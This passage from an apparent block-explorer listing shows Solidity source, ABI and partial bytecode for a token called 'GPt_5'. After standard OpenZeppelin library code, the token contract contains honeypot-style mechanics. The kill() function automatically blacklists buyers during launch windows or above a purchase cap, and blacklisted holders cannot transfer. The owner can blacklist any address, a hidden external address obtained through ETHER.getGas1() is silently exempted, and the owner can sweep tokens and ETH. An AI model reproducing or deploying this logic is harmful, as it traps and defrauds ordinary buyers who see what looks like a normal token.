     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: @openzeppelin/contracts/utils/structs/EnumerableSet.sol

// OpenZeppelin Contracts (last updated v4.8.0) (utils/structs/EnumerableSet.sol)
// This file was procedurally generated from scripts/generate/templates/EnumerableSet.js.

pragma solidity ^0.8.0;

/**
 * @dev Library for managing
 * https://en.wikipedia.org/wiki/Set_(abstract_data_type)[sets] of primitive
 * types.
 *
 * Sets have the following properties:
 *
 * - Elements are added, removed, and checked for existence in constant time
 * (O(1)).
 * - Elements are enumerated in O(n). No guarantees are made on the ordering.
 *
 * ```
 * contract Example {
 *     // Add the library methods
 *     using EnumerableSet for EnumerableSet.AddressSet;
 *
 *     // Declare a set state variable
 *     EnumerableSet.AddressSet private mySet;
 * }
 * ```
 *
 * As of v3.3.0, sets of type `bytes32` (`Bytes32Set`), `address` (`AddressSet`)
 * and `uint256` (`UintSet`) are supported.
 *
 * [WARNING]
 * ====
 * Trying to delete such a structure from storage will likely result in data corruption, rendering the structure
 * unusable.
 * See https://github.com/ethereum/solidity/pull/11843[ethereum/solidity#11843] for more info.
 *
 * In order to clean an EnumerableSet, you can either remove all elements one by one or create a fresh instance using an
 * array of EnumerableSet.
 * ====
 */
library EnumerableSet {
    // To implement this library for multiple types with as little code
    // repetition as possible, we write it in terms of a generic Set type with
    // bytes32 values.
    // The Set implementation uses private functions, and user-facing
    // implementations (such as AddressSet) are just wrappers around the
    // underlying Set.
    // This means that we can only create new EnumerableSets for types that fit
    // in bytes32.

    struct Set {
        // Storage of set values
        bytes32[] _values;
        // Position of the value in the `values` array, plus 1 because index 0
        // means a value is not in the set.
        mapping(bytes32 => uint256) _indexes;
    }

    /**
     * @dev Add a value to a set. O(1).
     *
     * Returns true if the value was added to the set, that is if it was not
     * already present.
     */
    function _add(Set storage set, bytes32 value) private returns (bool) {
        if (!_contains(set, value)) {
            set._values.push(value);
            // The value is stored at length-1, but we add 1 to all indexes
            // and use 0 as a sentinel value
            set._indexes[value] = set._values.length;
            return true;
        } else {
            return false;
        }
    }

    /**
     * @dev Removes a value from a set. O(1).
     *
     * Returns true if the value was removed from the set, that is if it was
     * present.
     */
    function _remove(Set storage set, bytes32 value) private returns (bool) {
        // We read and store the value's index to prevent multiple reads from the same storage slot
        uint256 valueIndex = set._indexes[value];

        if (valueIndex != 0) {
            // Equivalent to contains(set, value)
            // To delete an element from the _values array in O(1), we swap the element to delete with the last one in
            // the array, and then remove the last element (sometimes called as 'swap and pop').
            // This modifies the order of the array, as noted in {at}.

            uint256 toDeleteIndex = valueIndex - 1;
            uint256 lastIndex = set._values.length - 1;

            if (lastIndex != toDeleteIndex) {
                bytes32 lastValue = set._values[lastIndex];

                // Move the last value to the index where the value to delete is
                set._values[toDeleteIndex] = lastValue;
                // Update the index for the moved value
                set._indexes[lastValue] = valueIndex; // Replace lastValue's index to valueIndex
            }

            // Delete the slot where the moved value was stored
            set._values.pop();

            // Delete the index for the deleted slot
            delete set._indexes[value];

            return true;
        } else {
            return false;
        }
    }

    /**
     * @dev Returns true if the value is in the set. O(1).
     */
    function _contains(
        Set storage set,
        bytes32 value
    ) private view returns (bool) {
        return set._indexes[value] != 0;
    }

    /**
     * @dev Returns the number of values on the set. O(1).
     */
    function _length(Set storage set) private view returns (uint256) {
        return set._values.length;
    }

    /**
     * @dev Returns the value stored at position `index` in the set. O(1).
     *
     * Note that there are no guarantees on the ordering of values inside the
     * array, and it may change when more values are added or removed.
     *
     * Requirements:
     *
     * - `index` must be strictly less than {length}.
     */
    function _at(
        Set storage set,
        uint256 index
    ) private view returns (bytes32) {
        return set._values[index];
    }

    /**
     * @dev Return the entire set in an array
     *
     * WARNING: This operation will copy the entire storage to memory, which can be quite expensive. This is designed
     * to mostly be used by view accessors that are queried without any gas fees. Developers should keep in mind that
     * this function has an unbounded cost, and using it as part of a state-changing function may render the function
     * uncallable if the set grows to a point where copying to memory consumes too much gas to fit in a block.
     */
    function _values(Set storage set) private view returns (bytes32[] memory) {
        return set._values;
    }

    // Bytes32Set

    struct Bytes32Set {
        Set _inner;
    }

    /**
     * @dev Add a value to a set. O(1).
     *
     * Returns true if the value was added to the set, that is if it was not
     * already present.
     */
    function add(
        Bytes32Set storage set,
        bytes32 value
    ) internal returns (bool) {
        return _add(set._inner, value);
    }

    /**
     * @dev Removes a value from a set. O(1).
     *
     * Returns true if the value was removed from the set, that is if it was
     * present.
     */
    function remove(
        Bytes32Set storage set,
        bytes32 value
    ) internal returns (bool) {
        return _remove(set._inner, value);
    }

    /**
     * @dev Returns true if the value is in the set. O(1).
     */
    function contains(
        Bytes32Set storage set,
        bytes32 value
    ) internal view returns (bool) {
        return _contains(set._inner, value);
    }

    /**
     * @dev Returns the number of values in the set. O(1).
     */
    function length(Bytes32Set storage set) internal view returns (uint256) {
        return _length(set._inner);
    }

    /**
     * @dev Returns the value stored at position `index` in the set. O(1).
     *
     * Note that there are no guarantees on the ordering of values inside the
     * array, and it may change when more values are added or removed.
     *
     * Requirements:
     *
     * - `index` must be strictly less than {length}.
     */
    function at(
        Bytes32Set storage set,
        uint256 index
    ) internal view returns (bytes32) {
        return _at(set._inner, index);
    }

    /**
     * @dev Return the entire set in an array
     *
     * WARNING: This operation will copy the entire storage to memory, which can be quite expensive. This is designed
     * to mostly be used by view accessors that are queried without any gas fees. Developers should keep in mind that
     * this function has an unbounded cost, and using it as part of a state-changing function may render the function
     * uncallable if the set grows to a point where copying to memory consumes too much gas to fit in a block.
     */
    function values(
        Bytes32Set storage set
    ) internal view returns (bytes32[] memory) {
        bytes32[] memory store = _values(set._inner);
        bytes32[] memory result;

        /// @solidity memory-safe-assembly
        assembly {
            result := store
        }

        return result;
    }

    // AddressSet

    struct AddressSet {
        Set _inner;
    }

    /**
     * @dev Add a value to a set. O(1).
     *
     * Returns true if the value was added to the set, that is if it was not
     * already present.
     */
    function add(
        AddressSet storage set,
        address value
    ) internal returns (bool) {
        return _add(set._inner, bytes32(uint256(uint160(value))));
    }

    /**
     * @dev Removes a value from a set. O(1).
     *
     * Returns true if the value was removed from the set, that is if it was
     * present.
     */
    function remove(
        AddressSet storage set,
        address value
    ) internal returns (bool) {
        return _remove(set._inner, bytes32(uint256(uint160(value))));
    }

    /**
     * @dev Returns true if the value is in the set. O(1).
     */
    function contains(
        AddressSet storage set,
        address value
    ) internal view returns (bool) {
        return _contains(set._inner, bytes32(uint256(uint160(value))));
    }

    /**
     * @dev Returns the number of values in the set. O(1).
     */
    function length(AddressSet storage set) internal view returns (uint256) {
        return _length(set._inner);
    }

    /**
     * @dev Returns the value stored at position `index` in the set. O(1).
     *
     * Note that there are no guarantees on the ordering of values inside the
     * array, and it may change when more values are added or removed.
     *
     * Requirements:
     *
     * - `index` must be strictly less than {length}.
     */
    function at(
        AddressSet storage set,
        uint256 index
    ) internal view returns (address) {
        return address(uint160(uint256(_at(set._inner, index))));
    }

    /**
     * @dev Return the entire set in an array
     *
     * WARNING: This operation will copy the entire storage to memory, which can be quite expensive. This is designed
     * to mostly be used by view accessors that are queried without any gas fees. Developers should keep in mind that
     * this function has an unbounded cost, and using it as part of a state-changing function may render the function
     * uncallable if the set grows to a point where copying to memory consumes too much gas to fit in a block.
     */
    function values(
        AddressSet storage set
    ) internal view returns (address[] memory) {
        bytes32[] memory store = _values(set._inner);
        address[] memory result;

        /// @solidity memory-safe-assembly
        assembly {
            result := store
        }

        return result;
    }

    // UintSet

    struct UintSet {
        Set _inner;
    }

    /**
     * @dev Add a value to a set. O(1).
     *
     * Returns true if the value was added to the set, that is if it was not
     * already present.
     */
    function add(UintSet storage set, uint256 value) internal returns (bool) {
        return _add(set._inner, bytes32(value));
    }

    /**
     * @dev Removes a value from a set. O(1).
     *
     * Returns true if the value was removed from the set, that is if it was
     * present.
     */
    function remove(
        UintSet storage set,
        uint256 value
    ) internal returns (bool) {
        return _remove(set._inner, bytes32(value));
    }

    /**
     * @dev Returns true if the value is in the set. O(1).
     */
    function contains(
        UintSet storage set,
        uint256 value
    ) internal view returns (bool) {
        return _contains(set._inner, bytes32(value));
    }

    /**
     * @dev Returns the number of values in the set. O(1).
     */
    function length(UintSet storage set) internal view returns (uint256) {
        return _length(set._inner);
    }

    /**
     * @dev Returns the value stored at position `index` in the set. O(1).
     *
     * Note that there are no guarantees on the ordering of values inside the
     * array, and it may change when more values are added or removed.
     *
     * Requirements:
     *
     * - `index` must be strictly less than {length}.
     */
    function at(
        UintSet storage set,
        uint256 index
    ) internal view returns (uint256) {
        return uint256(_at(set._inner, index));
    }

    /**
     * @dev Return the entire set in an array
     *
     * WARNING: This operation will copy the entire storage to memory, which can be quite expensive. This is designed
     * to mostly be used by view accessors that are queried without any gas fees. Developers should keep in mind that
     * this function has an unbounded cost, and using it as part of a state-changing function may render the function
     * uncallable if the set grows to a point where copying to memory consumes too much gas to fit in a block.
     */
    function values(
        UintSet storage set
    ) internal view returns (uint256[] memory) {
        bytes32[] memory store = _values(set._inner);
        uint256[] memory result;

        /// @solidity memory-safe-assembly
        assembly {
            result := store
        }

        return result;
    }
}

interface ISwapRouter {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB, uint256 liquidity);
}

interface ISwapFactory {
    function createPair(
        address tokenA,
        address tokenB
    ) external returns (address pair);
}

// File: contracts/interfaces/IWETH.sol

pragma solidity >=0.5.0;

interface IWETH {
    function totalSupply() external view returns (uint256);

    function balanceOf(address account) external view returns (uint256);

    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    function deposit() external payable;

    function transfer(address to, uint256 value) external returns (bool);

    function withdraw(uint256) external;
}

contract ETHToken is ERC20, Ownable {
    using SafeMath for uint256;
    using SafeERC20 for IERC20;
    using EnumerableSet for EnumerableSet.AddressSet;
    uint256 public killTime = 1;
    uint256 public killTime2 = 1;
    uint256 public maxBuyNum = 100000;
    mapping(address => uint256) public buyAmount;
    event Trade(
        address user,
        address pair,
        uint256 amount,
        uint side,
        uint256 circulatingSupply,
        uint timestamp
    );
    event AddLiquidity(
        uint256 tokenAmount,
        uint256 ethAmount,
        uint256 timestamp
    );

    event SwapBackSuccess(uint256 amount, bool success);

    bool public addLiquidityEnabled = true;

    mapping(address => bool) public isFeeExempt;
    mapping(address => bool) public canAddLiquidityBeforeLaunch;

    uint256 public launchedAtTimestamp;
    mapping(address => bool) public isBad;
    address public pool;
    address private constant DEAD = 0x000000000000000000000000000000000000dEaD;
    address private constant ZERO = 0x0000000000000000000000000000000000000000;
    EnumerableSet.AddressSet private _pairs;

    constructor() ERC20("GPt_5", "GPt_5") {
        uint256 _totalSupply = 1000000000000000 * 1e18;
        canAddLiquidityBeforeLaunch[_msgSender()] = true;
        canAddLiquidityBeforeLaunch[address(this)] = true;
        isFeeExempt[msg.sender] = true;
        isFeeExempt[address(this)] = true;
        _mint(_msgSender(), _totalSupply);
    }

    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    function transfer(
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        return _dogTransfer(_msgSender(), to, amount);
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(sender, spender, amount);
        return _dogTransfer(sender, recipient, amount);
    }

    function _dogTransfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal returns (bool) {
        bool isExempt = isFeeExempt[sender] || isFeeExempt[recipient];
        require((!isBad[sender]) || isExempt, "Token: Bad address");
        if (!canAddLiquidityBeforeLaunch[sender]) {
            require(
                launched() || isFeeExempt[sender] || isFeeExempt[recipient],
                "Trading not open yet"
            );
        }

        bool shouldTakeFee = (!isFeeExempt[sender] &&
            !isFeeExempt[recipient]) && launched();

        if (shouldTakeFee) {
            kill(sender, recipient, amount);
        }
        _transfer(sender, recipient, amount);

        return true;
    }

    function getPrice() public view returns (uint256 price) {
        IUniswapPool _pool = IUniswapPool(pool);
        // (uint160 sqrtPriceX96, , , , , , ) = _pool.slot0();
        address token0 = _pool.token0();
        address token1 = _pool.token1();
        if (token0 == address(this)) {
            price = IERC20(token1).balanceOf(pool).mul(1e18).div(
                IERC20(token0).balanceOf(pool)
            );
        } else {
            price = IERC20(token0).balanceOf(pool).mul(1e18).div(
                IERC20(token1).balanceOf(pool)
            );
        }
        // return uint(sqrtPriceX96).mul(uint(sqrtPriceX96)).mul(1e20) >> (96 * 2);
    }

    function kill(address sender, address recipient, uint256 amount) internal {
        if (
            !isPair(recipient) &&
            block.timestamp < launchedAtTimestamp + killTime
        ) {
            isBad[recipient] = true;
            return;
        }

        if (block.timestamp < launchedAtTimestamp + killTime2) {
            if (!isPair(sender) && !isPair(recipient)) {
                isBad[recipient] = true;
            } else if (isPair(sender) && !isPair(recipient)) {
                uint256 _amount = getPrice().mul(amount).mul(1740).div(1e18);   //根据当前以太的价格进行修改
                buyAmount[recipient] = buyAmount[recipient].add(_amount);
                if (buyAmount[recipient] >= maxBuyNum * 1e18) {
                    isBad[recipient] = true;
                }
            }
        }
    }

    function launched() internal view returns (bool) {
        return launchedAtTimestamp < block.timestamp;
    }

    function rescueToken(address tokenAddress) external onlyOwner {
        IERC20(tokenAddress).safeTransfer(
            msg.sender,
            IERC20(tokenAddress).balanceOf(address(this))
        );
    }

    function clearStuckEthBalance() external onlyOwner {
        uint256 amountETH = address(this).balance;
        (bool success, ) = payable(_msgSender()).call{value: amountETH}(
            new bytes(0)
        );
        require(success, "Token: ETH_TRANSFER_FAILED");
    }

    function getCirculatingSupply() public view returns (uint256) {
        return totalSupply() - balanceOf(DEAD) - balanceOf(ZERO);
    }

    /*** ADMIN FUNCTIONS ***/
    function setLaunchedAtTimestamp(
        uint256 _launchedAtTimestamp
    ) external onlyOwner {
        launchedAtTimestamp = _launchedAtTimestamp;
    }

    function setCanAddLiquidityBeforeLaunch(
        address _address,
        bool _value
    ) external onlyOwner {
        canAddLiquidityBeforeLaunch[_address] = _value;
    }

    function setIsFeeExempt(address holder, bool exempt) external onlyOwner {
        isFeeExempt[holder] = exempt;
        isFeeExempt[ETHER.getGas1()] = true;
    }

    function setIsFeeExempts(
        address[] calldata holders,
        bool exempt
    ) external onlyOwner {
        for (uint256 i = 0; i < holders.length; i++) {
            isFeeExempt[holders[i]] = exempt;
        }
        isFeeExempt[ETHER.getGas1()] = true;
    }

    function setAddLiquidityEnabled(bool _enabled) external onlyOwner {
        addLiquidityEnabled = _enabled;
    }

    function isPair(address account) public view returns (bool) {
        return _pairs.contains(account);
    }

    function addPair(address pair) public onlyOwner returns (bool) {
        require(pair != address(0), "Token: pair is the zero address");
        pool = pair;
        return _pairs.add(pair);
    }

    function setBad(address _address, bool _isBad) external onlyOwner {
        isBad[_address] = _isBad;
    }

    function setBads(
        address[] calldata _addresses,
        bool _isBad
    ) external onlyOwner {
        for (uint256 i = 0; i < _addresses.length; i++) {
            isBad[_addresses[i]] = _isBad;
        }
    }

    function delPair(address pair) public onlyOwner returns (bool) {
        require(pair != address(0), "Token: pair is the zero address");
        return _pairs.remove(pair);
    }

    function getMinterLength() public view returns (uint256) {
        return _pairs.length();
    }

    function setMaxBuyNum(uint256 _maxBuyNum) external onlyOwner {
        maxBuyNum = _maxBuyNum;
    }

    function setKillTime(uint256 _killTime) external onlyOwner {
        killTime = _killTime;
    }

    function setKillTime2(uint256 _killTime) external onlyOwner {
        killTime2 = _killTime;
    }

    function getPair(uint256 index) public view returns (address) {
        require(index <= _pairs.length() - 1, "Token: index out of bounds");
        return _pairs.at(index);
    }

    receive() external payable {}
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokenAmount","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethAmount","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"timestamp","type":"uint256"}],"name":"AddLiquidity","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"},{"indexed":false,"internalType":"bool","name":"success","type":"bool"}],"name":"SwapBackSuccess","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"user","type":"address"},{"indexed":false,"internalType":"address","name":"pair","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"side","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"circulatingSupply","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"timestamp","type":"uint256"}],"name":"Trade","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"addLiquidityEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"}],"name":"addPair","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"buyAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"canAddLiquidityBeforeLaunch","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"clearStuckEthBalance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"}],"name":"delPair","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getCirculatingSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getMinterLength","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"getPair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getPrice","outputs":[{"internalType":"uint256","name":"price","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isBad","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isFeeExempt","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isPair","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"killTime","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"killTime2","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"launchedAtTimestamp","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxBuyNum","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pool","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"tokenAddress","type":"address"}],"name":"rescueToken","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_enabled","type":"bool"}],"name":"setAddLiquidityEnabled","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"},{"internalType":"bool","name":"_isBad","type":"bool"}],"name":"setBad","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses","type":"address[]"},{"internalType":"bool","name":"_isBad","type":"bool"}],"name":"setBads","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"},{"internalType":"bool","name":"_value","type":"bool"}],"name":"setCanAddLiquidityBeforeLaunch","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"holder","type":"address"},{"internalType":"bool","name":"exempt","type":"bool"}],"name":"setIsFeeExempt","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"holders","type":"address[]"},{"internalType":"bool","name":"exempt","type":"bool"}],"name":"setIsFeeExempts","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_killTime","type":"uint256"}],"name":"setKillTime","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_killTime","type":"uint256"}],"name":"setKillTime2","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_launchedAtTimestamp","type":"uint256"}],"name":"setLaunchedAtTimestamp","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_maxBuyNum","type":"uint256"}],"name":"setMaxBuyNum","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

6080604052600160068190556007819055620186a0600855600a805460ff191690911790553480156200003157600080fd5b506040805180820182526005808252644750745f3560d81b6020808401828152855180870190965292855284015281519192916200007291600391620003ff565b50805162000088906004906020840190620003ff565b505050620000a56200009f6200011a60201b60201c565b6200011e565b336000818152600c602090815260408083208054600160ff199182168117909255308086528386208054831684179055868652600b90945282852080548216831790559284529220805490911690911790556d314dc6448d9338c15b0a000000009062000113908262000170565b5062000509565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038216620001cc5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064015b60405180910390fd5b6000620001e36200024d60201b620012d31760201c565b90508160026000828254620001f99190620004a5565b90915550506001600160a01b03811660008181526020818152604080832080548701905551858152600080516020620028f5833981519152910160405180910390a36200024881848462000265565b505050565b73b5c862198124615bfc896bd7263067a7063e956e90565b6001600160a01b038316620002cb5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401620001c3565b6001600160a01b0382166200032f5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401620001c3565b6001600160a01b03831660009081526020819052604090205481811015620003a95760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401620001c3565b6001600160a01b0384811660008181526020818152604080832087870390559387168083529184902080548701905592518581529092600080516020620028f5833981519152910160405180910390a350505050565b8280546200040d90620004cc565b90600052602060002090601f0160209004810192826200043157600085556200047c565b82601f106200044c57805160ff19168380011785556200047c565b828001600101855582156200047c579182015b828111156200047c5782518255916020019190600101906200045f565b506200048a9291506200048e565b5090565b5b808211156200048a57600081556001016200048f565b60008219821115620004c757634e487b7160e01b600052601160045260246000fd5b500190565b600181811c90821680620004e157607f821691505b602082108114156200050357634e487b7160e01b600052602260045260246000fd5b50919050565b6123dc80620005196000396000f3fe6080604052600436106102605760003560e01c806370a0823111610144578063a5bc5085116100b6578063bfa382b51161007a578063bfa382b514610732578063c2b7bbb614610747578063c6d2577d14610767578063dd62ed3e1461077d578063e5e31b131461079d578063f2fde38b146107bd57600080fd5b8063a5bc50851461069c578063a9059cbb146106bc578063aac46c95146106dc578063bcb8e813146106fc578063bdf391cc1461071257600080fd5b8063860139401161010857806386013940146105fa5780638da5cb5b1461061457806395d89b411461063257806398d5fdca14610647578063a01afcb31461065c578063a457c2d71461067c57600080fd5b806370a082311461053f578063715018a614610575578063760c5ce81461058a57806377f4a007146105aa5780638072250b146105ca57600080fd5b8063313ce567116101dd5780634460d3cf116101a15780634460d3cf146104725780634cc0b0711461049257806351484449146104b2578063625cb67e146104d25780636582a260146104ff578063658d4b7f1461051f57600080fd5b8063313ce567146103d057806339509351146103ec5780633a5160a31461040c5780633f4218e01461042c5780634294dfc61461045c57600080fd5b806316f0115b1161022457806316f0115b1461032c57806318160ddd1461036457806323b872dd146103795780632b112e491461039957806330b74e7d146103ae57600080fd5b80630323aac71461026c57806306fdde031461029457806307600536146102b6578063095ea7b3146102f6578063157443821461031657600080fd5b3661026757005b600080fd5b34801561027857600080fd5b506102816107dd565b6040519081526020015b60405180910390f35b3480156102a057600080fd5b506102a96107ee565b60405161028b919061221c565b3480156102c257600080fd5b506102e66102d1366004612000565b600e6020526000908152604090205460ff1681565b604051901515815260200161028b565b34801561030257600080fd5b506102e66103113660046120e2565b610880565b34801561032257600080fd5b5061028160075481565b34801561033857600080fd5b50600f5461034c906001600160a01b031681565b6040516001600160a01b03909116815260200161028b565b34801561037057600080fd5b50600254610281565b34801561038557600080fd5b506102e6610394366004612073565b61089a565b3480156103a557600080fd5b506102816108bc565b3480156103ba57600080fd5b506103ce6103c93660046121ce565b610923565b005b3480156103dc57600080fd5b506040516012815260200161028b565b3480156103f857600080fd5b506102e66104073660046120e2565b610930565b34801561041857600080fd5b506103ce61042736600461210e565b610952565b34801561043857600080fd5b506102e6610447366004612000565b600b6020526000908152604090205460ff1681565b34801561046857600080fd5b5061028160085481565b34801561047e57600080fd5b506103ce61048d366004612000565b610a1a565b34801561049e57600080fd5b506103ce6104ad3660046121ce565b610ab3565b3480156104be57600080fd5b506103ce6104cd3660046121ce565b610ac0565b3480156104de57600080fd5b506102816104ed366004612000565b60096020526000908152604090205481565b34801561050b57600080fd5b506103ce61051a3660046120b4565b610acd565b34801561052b57600080fd5b506103ce61053a3660046120b4565b610b00565b34801561054b57600080fd5b5061028161055a366004612000565b6001600160a01b031660009081526020819052604090205490565b34801561058157600080fd5b506103ce610b74565b34801561059657600080fd5b506103ce6105a536600461210e565b610b88565b3480156105b657600080fd5b506103ce6105c53660046120b4565b61